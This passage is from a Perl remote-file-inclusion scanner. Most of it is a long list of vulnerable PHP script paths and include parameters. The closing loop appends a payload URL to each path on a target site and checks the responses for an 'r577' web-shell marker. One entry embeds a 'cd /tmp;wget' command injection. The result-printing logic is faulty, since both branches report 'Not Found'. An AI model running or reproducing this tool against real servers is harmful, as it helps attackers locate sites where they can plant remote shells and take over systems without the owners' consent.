  1865. 'impex/ImpExData.php?systempath=',
  1866.  
  1867. 'forum/impex/ImpExData.php?systempath=',
  1868.  
  1869. 'forums/impex/ImpExData.php?systempath=',
  1870.  
  1871. 'application.php?base_path=',
  1872.  
  1873. 'index.php?theme_path=',
  1874.  
  1875. 'become_editor.php?theme_path=',
  1876.  
  1877. 'add.php?theme_path=',
  1878.  
  1879. 'bad_link.php?theme_path=',
  1880.  
  1881. 'browse.php?theme_path=',
  1882.  
  1883. 'detail.php?theme_path=',
  1884.  
  1885. 'fav.php?theme_path=',
  1886.  
  1887. 'get_rated.php?theme_path=',
  1888.  
  1889. 'login.php?theme_path=',
  1890.  
  1891. 'mailing_list.php?theme_path=',
  1892.  
  1893. 'new.php?theme_path=',
  1894.  
  1895. 'modify.php?theme_path=',
  1896.  
  1897. 'pick.php?theme_path=',
  1898.  
  1899. 'power_search.php?theme_path=',
  1900.  
  1901. 'rating.php?theme_path=',
  1902.  
  1903. 'register.php?theme_path=',
  1904.  
  1905. 'review.php?theme_path=',
  1906.  
  1907. 'rss.php?theme_path=',
  1908.  
  1909. 'search.php?theme_path=',
  1910.  
  1911. 'send_pwd.php?theme_path=',
  1912.  
  1913. 'sendmail.php?theme_path=',
  1914.  
  1915. 'tell_friend.php?theme_path=',
  1916.  
  1917. 'top_rated.php?theme_path=',
  1918.  
  1919. 'user_detail.php?theme_path=',
  1920.  
  1921. 'user_search.php?theme_path=',
  1922.  
  1923. 'invoice.php?base_path=',
  1924.  
  1925. 'cgi-bin//classes/adodbt/sql.php?classes_dir=',
  1926.  
  1927. 'cgi-bin/install/index.php?G_PATH=',
  1928.  
  1929. 'cgi-bin/include/print_category.php?dir=',
  1930.  
  1931. 'includes/class_template.php?quezza_root_path=',
  1932.  
  1933. 'bazar/classified_right.php?language_dir=',
  1934.  
  1935. 'classified_right.php?language_dir=',
  1936.  
  1937. 'phpBazar/classified_right.php?language_dir=',
  1938.  
  1939. 'chat/messagesL.php3?cmd=',
  1940.  
  1941. 'phpMyChat/chat/messagesL.php3?cmd=',
  1942.  
  1943. 'bbs/include/write.php?dir=',
  1944.  
  1945. 'visitorupload.php?cmd=',
  1946.  
  1947. 'modules/center/admin/accounts/process.php?module_path]=',
  1948.  
  1949. 'index.php?template=',
  1950.  
  1951. 'armygame.php?libpath=',
  1952.  
  1953. 'lire.php?rub=',
  1954.  
  1955. 'pathofhostadmin/?page=',
  1956.  
  1957. 'apa_phpinclude.inc.php?apa_module_basedir=',
  1958.  
  1959. 'index.php?req_path=',
  1960.  
  1961. 'research/boards/encapsbb-0.3.2_fixed/index_header.php?root=',
  1962.  
  1963. 'Farsi1/index.php?archive=',
  1964.  
  1965. 'index.php?archive=',
  1966.  
  1967. 'show_archives.php?template=',
  1968.  
  1969. 'forum/include/common.php?pun_root=',
  1970.  
  1971. 'pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=',
  1972.  
  1973. 'vuln.php?=',
  1974.  
  1975. 'cgi-bin//include/write.php?dir=',
  1976.  
  1977. 'admin/common.inc.php?basepath=',
  1978.  
  1979. 'pm/lib.inc.php?sfx=',
  1980.  
  1981. 'pm/lib.inc.php?pm_path=',
  1982.  
  1983. 'artmedic-kleinanzeigen-path/index.php?id=',
  1984.  
  1985. 'index.php?pagina=',
  1986.  
  1987. 'osticket/include/main.php?include_dir=',
  1988.  
  1989. 'include/main.php?config[search_disp]=include_dir=',
  1990.  
  1991. 'phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=',
  1992.  
  1993. 'quick_reply.php?phpbb_root_path=',
  1994.  
  1995. 'zboard/include/write.php?dir=',
  1996.  
  1997. 'PATH/admin/plog-admin-functions.php?configbasedir=',
  1998.  
  1999. 'path_to_phpgreetz/content.php?content=',
  2000.  
  2001. 'path_to_qnews/q-news.php?id=',
  2002.  
  2003. '_conf/core/common-tpl-vars.php?confdir=',
  2004.  
  2005. 'votebox.php?VoteBoxPath=',
  2006.  
  2007. 'al_initialize.php?alpath=',
  2008.  
  2009. 'include/db.php?GLOBALS[rootdp]=',
  2010.  
  2011. 'modules/news/archivednews.php?GLOBALS[language_home]=',
  2012.  
  2013. 'protection.php?siteurl=',
  2014.  
  2015. 'modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=',
  2016.  
  2017. 'index2.php?includes_dir=',
  2018.  
  2019. 'classes.php?LOCAL_PATH=',
  2020.  
  2021. 'extensions/moblog/moblog_lib.php?basedir=',
  2022.  
  2023. 'modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=',
  2024.  
  2025. 'phpWebLog/include/init.inc.php?G_PATH=',
  2026.  
  2027. 'admin/objects.inc.php4?Server=',
  2028.  
  2029. 'trg_news30/trgnews/install/article.php?dir=',
  2030.  
  2031. 'block.php?Include=',
  2032.  
  2033. 'arpuivo.php?data=',
  2034.  
  2035. 'path_to_gallery/setup/index.php?GALLERY_BASEDIR=',
  2036.  
  2037. 'include/help.php?base=',
  2038.  
  2039. 'index.php?[Home]=',
  2040.  
  2041. 'path_to_script/block.php?Include=',
  2042.  
  2043. 'examples/phonebook.php?page=',
  2044.  
  2045. 'PHPNews/auth.php?path=',
  2046.  
  2047. 'include/print_category.php?dir=',
  2048.  
  2049. 'skin/zero_vote/login.php?dir=',
  2050.  
  2051. 'skin/zero_vote/setup.php?dir=',
  2052.  
  2053. 'skin/zero_vote/ask_password.php?dir=',
  2054.  
  2055. 'gui/include/sql.php?include_path=',
  2056.  
  2057. 'webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=',
  2058.  
  2059. 'email.php?login=cer_skin=',
  2060.  
  2061. 'PhotoGal/ops/gals.php?news_file=',
  2062.  
  2063. 'index.php?custom=',
  2064.  
  2065. 'loginout.php?cutepath=',
  2066.  
  2067. 'oneadmin/config.php?path[docroot]=',
  2068.  
  2069. 'xcomic/initialize.php?xcomicRootPath=',
  2070.  
  2071. 'skin/zero_vote/setup.php?dir=',
  2072.  
  2073. 'skin/zero_vote/error.php? dir=',
  2074.  
  2075. 'admin_modules/admin_module_captions.inc.php?config[path_src_include]=',
  2076.  
  2077. 'admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=',
  2078.  
  2079. 'admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=',
  2080.  
  2081. 'admin_modules/admin_module_edit.inc.php?config[path_src_include]=',
  2082.  
  2083. 'admin_modules/admin_module_delimage.inc.php?config[path_src_include]=',
  2084.  
  2085. 'admin_modules/admin_module_deldir.inc.php?config[path_src_include]=',
  2086.  
  2087. 'src/index_overview.inc.php?config[path_src_include]=',
  2088.  
  2089. 'src/index_leftnavbar.inc.php?config[path_src_include]=',
  2090.  
  2091. 'src/index_image.inc.php?config[path_src_include]=',
  2092.  
  2093. 'src/image-gd.class.php?config[path_src_include]=',
  2094.  
  2095. 'src/image.class.php?config[path_src_include]=',
  2096.  
  2097. 'src/album.class.php?config[path_src_include]=',
  2098.  
  2099. 'src/show_random.inc.php?config[path_src_include]=',
  2100.  
  2101. 'src/main.inc.php?config[path_src_include]=',
  2102.  
  2103. 'src/index_passwd-admin.inc.php?config[path_admin_include]=',
  2104.  
  2105. 'yappa-ng/src/index_overview.inc.php?config[path_src_include]=',
  2106.  
  2107. 'admin_modules/admin_module_captions.inc.php?config[path_src_include]=',
  2108.  
  2109. 'admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=',
  2110.  
  2111. 'admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=',
  2112.  
  2113. 'admin_modules/admin_module_edit.inc.php?config[path_src_include]=',
  2114.  
  2115. 'admin_modules/admin_module_delimage.inc.php?config[path_src_include]=',
  2116.  
  2117. 'admin_modules/admin_module_deldir.inc.php?config[path_src_include]=',
  2118.  
  2119. 'src/index_overview.inc.php?config[path_src_include]=',
  2120.  
  2121. 'src/image-gd.class.php?config[path_src_include]=',
  2122.  
  2123. 'src/image.class.php?config[image_module]=',
  2124.  
  2125. 'src/album.class.php?config[path_src_include]=',
  2126.  
  2127. 'src/show_random.inc.php?config[path_src_include]=',
  2128.  
  2129. 'src/main.inc.php?config[path_src_include]=',
  2130.  
  2131. 'includes/db_adodb.php?baseDir=',
  2132.  
  2133. 'includes/db_connect.php?baseDir=',
  2134.  
  2135. 'includes/session.php?baseDir=',
  2136.  
  2137. 'modules/projects/gantt.php?dPconfig[root_dir]=',
  2138.  
  2139. 'modules/projects/gantt2.php?dPconfig[root_dir]=',
  2140.  
  2141. 'modules/projects/vw_files.php?dPconfig[root_dir]=',
  2142.  
  2143. 'modules/admin/vw_usr_roles.php?baseDir=',
  2144.  
  2145. 'modules/public/calendar.php?baseDir=',
  2146.  
  2147. 'modules/public/date_format.php?baseDir=',
  2148.  
  2149. 'modules/tasks/gantt.php?baseDir=',
  2150.  
  2151. 'mantis/login_page.php?g_meta_include_file=',
  2152.  
  2153. 'phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=',
  2154.  
  2155. 'modules/My_eGallery/public/displayCategory.php?basepath=',
  2156.  
  2157. 'dotproject/modules/files/index_table.php?root_dir=',
  2158.  
  2159. 'nukebrowser.php?filnavn=',
  2160.  
  2161. 'bug_sponsorship_list_view_inc.php?t_core_path=',
  2162.  
  2163. 'modules/coppermine/themes/coppercop/theme.php?THEME_DIR=',
  2164.  
  2165. 'modules/coppermine/themes/maze/theme.php?THEME_DIR=',
  2166.  
  2167. 'modules/coppermine/include/init.inc.php?CPG_M_DIR=',
  2168.  
  2169. 'includes/calendar.php?phpc_root_path=',
  2170.  
  2171. 'includes/setup.php?phpc_root_path=',
  2172.  
  2173. 'phpBB/admin/admin_styles.php?mode=',
  2174.  
  2175. 'aMember/plugins/db/mysql/mysql.inc.php?config=',
  2176.  
  2177. 'admin/lang.php?CMS_ADMIN_PAGE=',
  2178.  
  2179. 'inc/pipe.php?HCL_path=',
  2180.  
  2181. 'include/write.php?dir=',
  2182.  
  2183. 'becommunity/community/index.php?pageurl=',
  2184.  
  2185. 'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',
  2186.  
  2187. 'modules/mod_mainmenu.php?mosConfig_absolute_path=',
  2188.  
  2189. 'modules/agendax/addevent.inc.php?agendax_path=',
  2190.  
  2191. 'shoutbox/expanded.php?conf=',
  2192.  
  2193. 'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',
  2194.  
  2195. 'index.php?page=',
  2196.  
  2197. 'index.php?pag=',
  2198.  
  2199. 'index.php?include=',
  2200.  
  2201. 'index.php?content=',
  2202.  
  2203. 'index.php?cont=',
  2204.  
  2205. 'index.php?c=',
  2206.  
  2207. 'modules/My_eGallery/index.php?basepath=',
  2208.  
  2209. 'modules/newbb_plus/class/forumpollrenderer.php?bbPath=',
  2210.  
  2211. 'journal.php?m=',
  2212.  
  2213. 'index.php?m=',
  2214.  
  2215. 'links.php?c=',
  2216.  
  2217. 'forums.php?m=',
  2218.  
  2219. 'list.php?c=',
  2220.  
  2221. 'user.php?xoops_redirect=',
  2222.  
  2223. 'index.php?id=',
  2224.  
  2225. 'r.php?url=',
  2226.  
  2227. 'CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=',
  2228.  
  2229. 'inc/formmail.inc.php?script_root=',
  2230.  
  2231. 'include/init.inc.php?G_PATH=',
  2232.  
  2233. 'backend/addons/links/index.php?PATH=',
  2234.  
  2235. 'modules/newbb_plus/class/class.forumposts.php?bbPath[path]=',
  2236.  
  2237. 'modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=',
  2238.  
  2239. 'protection.php?siteurl=',
  2240.  
  2241. 'htmltonuke.php?filnavn=',
  2242.  
  2243. 'mail_autocheck.php?pm_path=',
  2244.  
  2245. 'index.php?p=',
  2246.  
  2247. 'modules/4nAlbum/public/displayCategory.php?basepath=',
  2248.  
  2249. 'e107/e107_handlers/secure_img_render.php?p=',
  2250.  
  2251. 'include/new-visitor.inc.php?lvc_include_dir=',
  2252.  
  2253. 'path_of_cpcommerce/_functions.php?prefix=',
  2254.  
  2255. 'community/modules/agendax/addevent.inc.php?agendax_path=',
  2256.  
  2257. 'library/editor/editor.php?root=',
  2258.  
  2259. 'library/lib.php?root=',
  2260.  
  2261. 'zentrack/index.php?configFile=',
  2262.  
  2263. 'pivot/modules/module_db.php?pivot_path=',
  2264.  
  2265. 'main.php?x=',
  2266.  
  2267. 'myPHPCalendar/admin.php?cal_dir=',
  2268.  
  2269. 'index.php/main.php?x=',
  2270.  
  2271. 'index.php?x=',
  2272.  
  2273. 'index.php?open=',
  2274.  
  2275. 'index.php?visualizar=',
  2276.  
  2277. 'template.php?pagina=',
  2278.  
  2279. 'index.php?inc=',
  2280.  
  2281. 'includes/include_onde.php?include_file=',
  2282.  
  2283. 'index.php?pg=',
  2284.  
  2285. 'index.php?show=',
  2286.  
  2287. 'index.php?cat=',
  2288.  
  2289. 'print.php?val1=',
  2290.  
  2291. 'cmd.php?function=',
  2292.  
  2293. 'iframe.php?file=',
  2294.  
  2295. 'os/pointer.php?url=',
  2296.  
  2297. 'p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=',
  2298.  
  2299. 'index.php?file=',
  2300.  
  2301. 'db.php?path_local=',
  2302.  
  2303. 'phpGedView/individual.php?PGV_BASE_DIRECTORY=',
  2304.  
  2305. 'index.php?kietu[url_hit]=',
  2306.  
  2307. 'phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=',
  2308.  
  2309. 'Sources/Packages.php?sourcedir=',
  2310.  
  2311. 'yabbse/Sources/Packages.php?sourcedir=',
  2312.  
  2313. 'modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=',
  2314.  
  2315. 'cgi-bin//gadgets/Blog/BlogModel.php?path=',
  2316.  
  2317. 'cgi-bin//admin.php?cal_dir=',
  2318.  
  2319. 'gallery/captionator.php?GALLERY_BASEDIR=',
  2320.  
  2321. 'cgi-bin/main.php?x=',
  2322.  
  2323. 'Blog/BlogModel.php?path=',
  2324.  
  2325. 'admin.php?cal_dir=',
  2326.  
  2327. 'expanded.php?conf=',
  2328.  
  2329. 'mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=',
  2330.  
  2331. 'pollvote/pollvote.php?pollname=',
  2332.  
  2333. 'displayCategory.php?basepath=',
  2334.  
  2335. 'phpBB2/admin/admin_cash.php?phpbb_root_path=',
  2336.  
  2337. 'modules/foro/includes/functions_admin.php?phpbb_root_path=',
  2338.  
  2339. 'modules/Forums/admin/admin_forums.php?phpEx=',
  2340.  
  2341. 'modules/Forums/admin/admin_disallow.php?phpEx=',
  2342.  
  2343. 'modules/Forums/admin/admin_smilies.php?phpEx=',
  2344.  
  2345. 'modules/Forums/admin/admin_board.php?phpEx=',
  2346.  
  2347. 'modules/Forums/admin/admin_users.php?phpEx=',
  2348.  
  2349. 'modules/Forums/admin/admin_mass_email.php?phpEx=',
  2350.  
  2351. 'modules/Forums/admin/admin_forum_prune.php?phpEx=',
  2352.  
  2353. 'modules/Forums/admin/admin_styles.php?phpbb_root_path=',
  2354.  
  2355. 'index.php?hc=',
  2356.  
  2357. 'mt-comments.cgi?id=',
  2358.  
  2359. 'webcalendar/tools/send_reminders.php?includedir=',
  2360.  
  2361. 'cmd/product_info.php/products_id/1622/shop_content.php?coID=',
  2362.  
  2363. 'addevent.inc.php?agendax_path=',
  2364.  
  2365. 'step_one.php?server_inc=',
  2366.  
  2367. 'upgrade_album.php?GALLERY_BASEDIR=',
  2368.  
  2369. 'search.php?cutepath=',
  2370.  
  2371. 'modules.php?name=',
  2372.  
  2373. 'wagora/extras//quicklist.php?site=',
  2374.  
  2375. 'vCard/admin/define.inc.php?match=',
  2376.  
  2377. 'forum/ubbthreads.php?Cat=',
  2378.  
  2379. 'admin/includes/classes/spaw/spaw_control.class.php?spaw_root=',
  2380.  
  2381. 'secure.php?cfgProgDir=',
  2382.  
  2383. 'modules/My_eGallery/public//inc/?HCL_path=',
  2384.  
  2385. 'modules/My_eGallery/public/imagen.php?basepath=',
  2386.  
  2387. 'adlayer.php?layerstyle=',
  2388.  
  2389. 'Forums/bb_smilies.php?name=',
  2390.  
  2391. 'modules/Forums/bb_smilies.php?name=',
  2392.  
  2393. 'gadgets/Blog/BlogModel.php?path=',
  2394.  
  2395. 'learnlinc/clmcpreload.php?CLPATH=',
  2396.  
  2397. 'modernbill/samples/news.php?DIR=',
  2398.  
  2399. 'religions/faq.php?page=',
  2400.  
  2401. 'forum/viewtopic.php?t=',
  2402.  
  2403. 'announcements.php?includePath=',
  2404.  
  2405. 'inc/header.php/step_one.php?server_inc=',
  2406.  
  2407. 'phpatm/index.php?include_location=',
  2408.  
  2409. 'gb/form.inc.php3?lang=',
  2410.  
  2411. 'shannen/index.php?x=',
  2412.  
  2413. 'family/phpgedview/index.php?PGV_BASE_DIRECTORY=',
  2414.  
  2415. 'main.php?left=',
  2416.  
  2417. 'forum/misc.php?action=',
  2418.  
  2419. 'nucleus/libs/globalfunctions.php?DIR_LIBS=',
  2420.  
  2421. 'show_archives.php?cutepath=',
  2422.  
  2423. 'gallery.php=',
  2424.  
  2425. 'magicforum/misc.php?action=',
  2426.  
  2427. 'forum/admin/actions/del.php?include_path=',
  2428.  
  2429. 'index.php?meio=',
  2430.  
  2431. 'local/investing_industrialeastate1.php?a=',
  2432.  
  2433. 'modules/coppermine/themes/default/theme.php?THEME_DIR',
  2434.  
  2435. 'Popper/index.php?childwindow.inc.php?form=',
  2436.  
  2437. 'class.mysql.php?path_to_bt_dir=',
  2438.  
  2439. 'include/footer.inc.php?_AMLconfig[cfg_serverpath]=',
  2440.  
  2441. 'eyeos/desktop.php?baccio=',
  2442.  
  2443. 'ashnews.php?pathtoashnews=',
  2444.  
  2445. 'index.php?modpath=',
  2446.  
  2447. 'becommunity/community/index.php?pageurl=',
  2448.  
  2449. 'index.php?sqld=',
  2450.  
  2451. 'modules/module_db.php?pivot_path=',
  2452.  
  2453. 'catalog/includes/include_once.php?include_file=',
  2454.  
  2455. 'cgi-bin/calendar.pl?fromTemplate=',
  2456.  
  2457. 'live/inc/pipe.php?HCL_path=',
  2458.  
  2459. 'zb41/include/write.php?dir=',
  2460.  
  2461. 'cgi-bin/awstats.pl?logfile=',
  2462.  
  2463. 'presse/stampa.php3?azione=',
  2464.  
  2465. 'inc/step_one_tables.php?server_inc=',
  2466.  
  2467. 'index.php?mainpage=',
  2468.  
  2469. 'phpprojekt/lib/authform.inc.php?path_pre=',
  2470.  
  2471. 'captionator.php?GALLERY_BASEDIR=',
  2472.  
  2473. '_head.php?_zb_path=.example.com',
  2474.  
  2475. 'achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=',
  2476.  
  2477. 'gallery/captionator.php?GALLERY_BASEDIR=.example.com',
  2478.  
  2479. 'globals.php3?LangCookie=.example.com',
  2480.  
  2481. 'include/msql.php?inc_dir=',
  2482.  
  2483. 'include/mssql7.php?inc_dir=',
  2484.  
  2485. 'include/mysql.php?inc_dir=',
  2486.  
  2487. 'include/oci8.php?inc_dir=',
  2488.  
  2489. 'include/postgres.php?inc_dir=',
  2490.  
  2491. 'include/postgres65.php?inc_dir=',
  2492.  
  2493. 'install.php?phpbb_root_dir=',
  2494.  
  2495. 'mantis/login_page.php?g_meta_inc_dir=',
  2496.  
  2497. 'page.php?template=',
  2498.  
  2499. 'phorum/admin/actions/del.php?include_path=',
  2500.  
  2501. 'pollensondage.inc.php?app_path=',
  2502.  
  2503. 'user/agora_user.php?inc_dir=',
  2504.  
  2505. 'user/ldap_example.php?inc_dir=',
  2506.  
  2507. 'userlist.php?ME=.example.com',
  2508.  
  2509. '_functions.php?prefix=',
  2510.  
  2511. 'cpcommerce/_functions.php?prefix=',
  2512.  
  2513. 'ashnews.php?pathtoashnews=cd /tmp;wget',
  2514.  
  2515. 'eblog/blog.inc.php?xoopsConfig[xoops_url]=',
  2516.  
  2517. 'b2-tools/gm-2-b2.php?b2inc=',
  2518.  
  2519. 'includes/include_once.php?include_file=',
  2520.  
  2521. 'modules.php?name=jokeid=',
  2522.  
  2523. 'index.php?site=',
  2524.  
  2525. 'livehelp/inc/pipe.php?HCL_path=',
  2526.  
  2527. 'hcl/inc/pipe.php?HCL_path=',
  2528.  
  2529. 'support/faq/inc/pipe.php?HCL_path=',
  2530.  
  2531. 'help/faq/inc/pipe.php?HCL_path=',
  2532.  
  2533. 'helpcenter/inc/pipe.php?HCL_path=',
  2534.  
  2535. 'live-support/inc/pipe.php?HCL_path=',
  2536.  
  2537. 'gnu3/index.php?doc=',
  2538.  
  2539. 'gnu/index.php?doc=',
  2540.  
  2541. 'phpgwapi/setup/tables_update.inc.php?appdir=',
  2542.  
  2543. 'includes/calendar.php?phpc_root_path=',
  2544.  
  2545. 'includes/setup.php?phpc_root_path=',
  2546.  
  2547. 'inc/authform.inc.php?path_pre=',
  2548.  
  2549. 'include/authform.inc.php?path_pre=',
  2550.  
  2551. 'web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=',
  2552.  
  2553. 'web_statistics//tools/send_reminders.php?includedir=',
  2554.  
  2555. 'web_statistics//include/write.php?dir=',
  2556.  
  2557. 'web_statistics//modules/My_eGallery/public/displayCategory.php?basepath=',
  2558.  
  2559. 'web_statistics//calendar/tools/send_reminders.php?includedir=',
  2560.  
  2561. 'web_statistics//skin/zero_vote/error.php?dir=',
  2562.  
  2563. 'web_statistics//coppercop/theme.php?THEME_DIR=',
  2564.  
  2565. 'includes/header.php?systempath=',
  2566.  
  2567. 'Gallery/displayCategory.php?basepath=',
  2568.  
  2569. 'index.inc.php?PATH_Includes=',
  2570.  
  2571. 'nphp/nphpd.php?nphp_config[LangFile]=',
  2572.  
  2573. 'ashheadlines.php?pathtoashnews=',
  2574.  
  2575. 'demo/includes/init.php?user_inc=',
  2576.  
  2577. 'jaf/index.php?show=',
  2578.  
  2579. 'inc/shows.inc.php?cutepath=',
  2580.  
  2581. 'poll/admin/common.inc.php?base_path=',
  2582.  
  2583. 'sources/post.php?fil_config=',
  2584.  
  2585. 'bb_lib/checkdb.inc.php?libpach=',
  2586.  
  2587. 'include/livre_include.php?chem_absolu=',
  2588.  
  2589. 'index.php?pageurl=',
  2590.  
  2591. 'derniers_commentaires.php?rep=',
  2592.  
  2593. 'modules/coppermine/themes/default/theme.php?THEME_DIR=',
  2594.  
  2595. 'coppermine/themes/maze/theme.php?THEME_DIR=',
  2596.  
  2597. 'allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=',
  2598.  
  2599. 'allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=',
  2600.  
  2601. 'agendax/addevent.inc.php?agendax_path=',
  2602.  
  2603. 'main.php?page=',
  2604.  
  2605. 'default.php?page=',
  2606.  
  2607. 'index.php?action=',
  2608.  
  2609. 'index1.php?p=',
  2610.  
  2611. 'index2.php?x=',
  2612.  
  2613. 'index2.php?content=',
  2614.  
  2615. 'index.php?conteudo=',
  2616.  
  2617. 'GradeMap/index.php?page=',
  2618.  
  2619. 'phpopenchat/contrib/yabbse/poc.php?sourcedir=',
  2620.  
  2621. 'calendar/calendar.php?serverPath=',
  2622.  
  2623. 'calendar/functions/popup.php?serverPath=',
  2624.  
  2625. 'calendar/events/header.inc.php?serverPath=',
  2626.  
  2627. 'calendar/events/datePicker.php?serverPath=',
  2628.  
  2629. 'calendar/setup/setupSQL.php?serverPath=',
  2630.  
  2631. 'calendar/setup/header.inc.php?serverPath=',
  2632.  
  2633. 'install/index.php?G_PATH=',
  2634.  
  2635. 'support/mailling/maillist/inc/initdb.php?absolute_path=',
  2636.  
  2637. 'coppercop/theme.php?THEME_DIR=',
  2638.  
  2639. 'dotproject/modules/projects/addedit.php?root_dir=',
  2640.  
  2641. 'dotproject/modules/projects/view.php?root_dir=',
  2642.  
  2643. 'dotproject/modules/projects/vw_files.php?root_dir=',
  2644.  
  2645. 'dotproject/modules/tasks/addedit.php?root_dir=',
  2646.  
  2647. 'dotproject/modules/tasks/viewgantt.php?root_dir=',
  2648.  
  2649. 'My_eGallery/public/displayCategory.php?basepath=',
  2650.  
  2651. 'index.php?meio.php=',
  2652.  
  2653. 'index.php?configFile=',
  2654.  
  2655. 'index.php?do=',
  2656.  
  2657. 'phpshop/index.php?base_dir=',
  2658.  
  2659. 'contacts.php?cal_dir=',
  2660.  
  2661. 'convert-date.php?cal_dir=',
  2662.  
  2663. 'album_portal.php?phpbb_root_path=',
  2664.  
  2665. 'mainfile.php?MAIN_PATH=',
  2666.  
  2667. 'html/affich.php?base=',
  2668.  
  2669. 'gallery/init.php?HTTP_POST_VARS=',
  2670.  
  2671. 'ideabox/include.php?gorumDir=',
  2672.  
  2673. 'stats/modules/My_eGallery/index.php?basepath=',
  2674.  
  2675. 'stats/include/write.php?dir=',
  2676.  
  2677. 'stats/tools/send_reminders.php?includedir=',
  2678.  
  2679. 'index.cgiupgrade_album.php?GALLERY_BASEDIR=',
  2680.  
  2681. 'pollvote/pollvote.php?pollname',
  2682.  
  2683. 'includes/page_header.php?dir=',
  2684.  
  2685. 'index2.php?mosConfig_absolute_path=',
  2686.  
  2687. 'new/bbs//include/write.php?dir=',
  2688.  
  2689. 'index.php?mosConfig_absolute_path=',
  2690.  
  2691. 'modules/My_eGallery/public/inc/?HCL_path=',
  2692.  
  2693. 'forum/auth/auth.php?phpbb_root_path=',
  2694.  
  2695. 'forum/auth/auth_phpbb/phpbb_root_path=',
  2696.  
  2697. 'cutenews/comments.php?cutepath=',
  2698.  
  2699. 'library/lib.php?root=',
  2700.  
  2701. 'impex/ImpExData.php?systempath=',
  2702.  
  2703. 'coppermine/thumbnails.php?lang=',
  2704.  
  2705. 'gallery/thumbnails.php?lang=',
  2706.  
  2707. 'aWebNews/visview.php?path_to_news=',
  2708.  
  2709. 'ashnews.php?pathtoashnews=',
  2710.  
  2711. '4images/index.php?template=',
  2712.  
  2713. 'galeri/index.php?template=',
  2714.  
  2715. 'components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=',
  2716.  
  2717. 'components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=',
  2718.  
  2719. 'components/com_smf/smf.php?mosConfig_absolute_path=',
  2720.  
  2721. 'components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=',
  2722.  
  2723. 'components/com_simpleboard/image_upload.php?sbp=',
  2724.  
  2725. 'gallery/index.php?template=',
  2726.  
  2727. 'auth/auth.php?phpbb_root_path=',
  2728.  
  2729. 'auth/auth_phpbb/phpbb_root_path=',
  2730.  
  2731. 'modules/Forums/admin/index.php?phpbb_root_path=',
  2732.  
  2733. 'modules/Forums/admin/admin_avatar.php?phpbb_root_path=',
  2734.  
  2735. 'modules/Forums/admin/admin_styles.php?phpbb_root_path=',
  2736.  
  2737. '_wk/wk_lang.php?wkPath=',
  2738.  
  2739. 'shoutbox/expanded.php?conf=',
  2740.  
  2741. 'myPHPCalendar/admin.php?cal_dir=',
  2742.  
  2743. 'phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=',
  2744.  
  2745. 'modules/Forums/admin/admin_board.php?phpEx=',
  2746.  
  2747. 'modules/Forums/admin/admin_users.php?phpEx=',
  2748.  
  2749. 'library/editor/editor.php?root=',
  2750.  
  2751. 'library/lib.php?root=',
  2752.  
  2753. 'e107/e107_handlers/secure_img_render.php?p=',
  2754.  
  2755. 'modules/My_eGallery/public/displayCategory.php?basepath=',
  2756.  
  2757. 'modules/My_eGallery/index.php?basepath=',
  2758.  
  2759. 'modules/coppermine/themes/default/theme.php?THEME_DIR=',
  2760.  
  2761. 'modules/4nAlbum/public/displayCategory.php?basepath=',
  2762.  
  2763. 'modules/coppermine/themes/coppercop/theme.php?THEME_DIR=',
  2764.  
  2765. 'modules/coppermine/themes/maze/theme.php?THEME_DIR=',
  2766.  
  2767. 'modules/coppermine/include/init.inc.php?CPG_M_DIR=',
  2768.  
  2769. 'phpBB/admin/admin_styles.php?mode=',
  2770.  
  2771. 'modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=',
  2772.  
  2773. 'modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=',
  2774.  
  2775. 'index.php?page=',
  2776.  
  2777. 'index.php?pag=',
  2778.  
  2779. 'index.php?sayfa=',
  2780.  
  2781. 'index.php?pg=',
  2782.  
  2783. 'index.php?include=',
  2784.  
  2785. 'index.php?content=',
  2786.  
  2787. 'index.php?p=',
  2788.  
  2789. 'index.php?s=',
  2790.  
  2791. 'index.php?cont=',
  2792.  
  2793. 'index.php?c=',
  2794.  
  2795. 'journal.php?m=',
  2796.  
  2797. 'index.php?m=',
  2798.  
  2799. 'links.php?c=',
  2800.  
  2801. 'forums.php?m=',
  2802.  
  2803. 'list.php?c=',
  2804.  
  2805. 'journal.php?m=',
  2806.  
  2807. 'user.php?xoops_redirect=',
  2808.  
  2809. 'index.php?id=');
  2810.  
  2811.     print color ("red") ,">Scanner Initialized[...]\n", color ("reset");
  2812.  
  2813.  
  2814.     foreach $scan(@vuls){
  2815.         $junk = $link."/".@vuls[$scan];
  2816.  
  2817.      $url = $link. "/" .@vuls[$scan].$include;
  2818.  
  2819.    
  2820.     $request = HTTP::Request->new(GET=>$url);
  2821.     $useragent = LWP::UserAgent->new();
  2822.  
  2823.     $response = $useragent->request($request);
  2824.    
  2825.    
  2826.     if ($response->is_success && $response->content =~ /r577/)
  2827.     { $msg = "Vulnerabel",
  2828.     print ("$scan..........[",color("green"),"Not Found", color ("reset"),"]\n");
  2829.     }
  2830.    
  2831.     else { $msg = "Not Found",
  2832.     print ("$scan..........[",color("green"),"Not Found", color ("reset"),"]\n");
  2833.     }
  2834.    open (OUTFILE, ">>vuls.txt");
  2835. print OUTFILE "$scan..........[$msg]\n";
